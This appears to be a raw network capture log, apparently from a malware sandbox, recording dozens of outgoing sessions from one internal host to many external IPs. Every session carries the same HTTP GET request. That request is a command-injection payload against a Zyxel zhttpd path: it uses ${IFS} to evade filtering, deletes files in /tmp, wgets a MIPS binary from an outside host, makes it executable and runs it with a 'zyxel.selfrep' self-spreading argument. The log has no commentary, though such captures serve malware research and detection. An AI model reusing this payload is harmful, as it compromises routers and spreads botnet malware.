                                                Jan 12, 2024 18:16:28.581162930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5765192.168.2.235972047.180.89.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.581213951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5766192.168.2.2346774149.101.242.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.581279993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5767192.168.2.2359240105.239.208.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.581346989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5768192.168.2.235992474.245.245.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.581373930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5769192.168.2.235362274.0.205.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.581443071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5770192.168.2.2356538143.48.74.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.581497908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5771192.168.2.2342768154.214.134.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.581557989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5772192.168.2.2348100144.94.78.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.581610918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5773192.168.2.234002818.240.114.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.581659079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5774192.168.2.234947639.59.138.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.581720114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5775192.168.2.2337438137.43.152.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.581795931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5776192.168.2.2336134170.209.208.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.581836939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5777192.168.2.235044020.71.202.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.581901073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5778192.168.2.2358266205.12.56.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.581957102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5779192.168.2.233440423.181.170.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.582009077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5780192.168.2.2352972124.71.55.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.582041979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5781192.168.2.2332820176.220.147.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.582092047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5782192.168.2.235622625.23.103.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.582146883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5783192.168.2.2342744197.187.114.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.582211971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5784192.168.2.2342550134.166.248.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.582259893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5785192.168.2.2345730172.82.206.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.582304955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5786192.168.2.2356552189.167.35.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.582366943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5787192.168.2.2349222197.92.80.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.582437992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5788192.168.2.235243262.172.235.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.582490921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5789192.168.2.2355016122.112.117.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.582561016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5790192.168.2.234563067.205.240.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.582622051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5791192.168.2.2352806176.63.65.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.582709074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5792192.168.2.2336438111.237.48.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.582767963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5793192.168.2.2347370216.22.177.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.582832098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5794192.168.2.233724848.116.128.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.582907915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5795192.168.2.2339066134.133.56.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.582983971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5796192.168.2.234517432.44.126.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.583115101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5797192.168.2.2357452209.92.189.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.583182096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5798192.168.2.2348626213.91.137.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.583240032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5799192.168.2.2348886136.80.10.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.583318949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5800192.168.2.2358688179.130.65.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.583374023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5801192.168.2.235905450.226.76.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.583436966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5802192.168.2.2352994209.136.201.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.583488941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5803192.168.2.2344464103.141.150.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.583578110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5804192.168.2.2332826209.80.157.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.583647013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5805192.168.2.2350278198.107.187.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.583676100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5806192.168.2.2351796131.153.46.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.583728075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5807192.168.2.2346776182.99.185.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.583812952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5808192.168.2.2344298158.42.109.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.583890915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5809192.168.2.234917845.36.178.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.583925009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5810192.168.2.234898088.243.202.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.583996058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5811192.168.2.2348104211.204.90.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.584069967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5812192.168.2.2340874182.24.174.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.584115982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5813192.168.2.2345512129.225.7.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.584175110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5814192.168.2.234825852.130.155.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.584259987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5815192.168.2.2353820160.246.57.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.584312916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5816192.168.2.2351138209.104.71.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.584404945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5817192.168.2.2345342107.19.151.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.584439993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5818192.168.2.234349885.248.131.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.584489107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5819192.168.2.2336362102.78.207.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.584536076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5820192.168.2.23327982.24.181.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.584609985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5821192.168.2.2335754212.253.249.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.584672928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5822192.168.2.2342534180.51.23.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.584729910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5823192.168.2.234151240.173.155.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.584789991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5824192.168.2.235641632.74.33.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.584865093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5825192.168.2.234499473.199.88.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.584950924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5826192.168.2.2354448159.235.85.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.585045099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5827192.168.2.2334608134.254.47.110443
                                                TimestampBytes transferredDirectionData
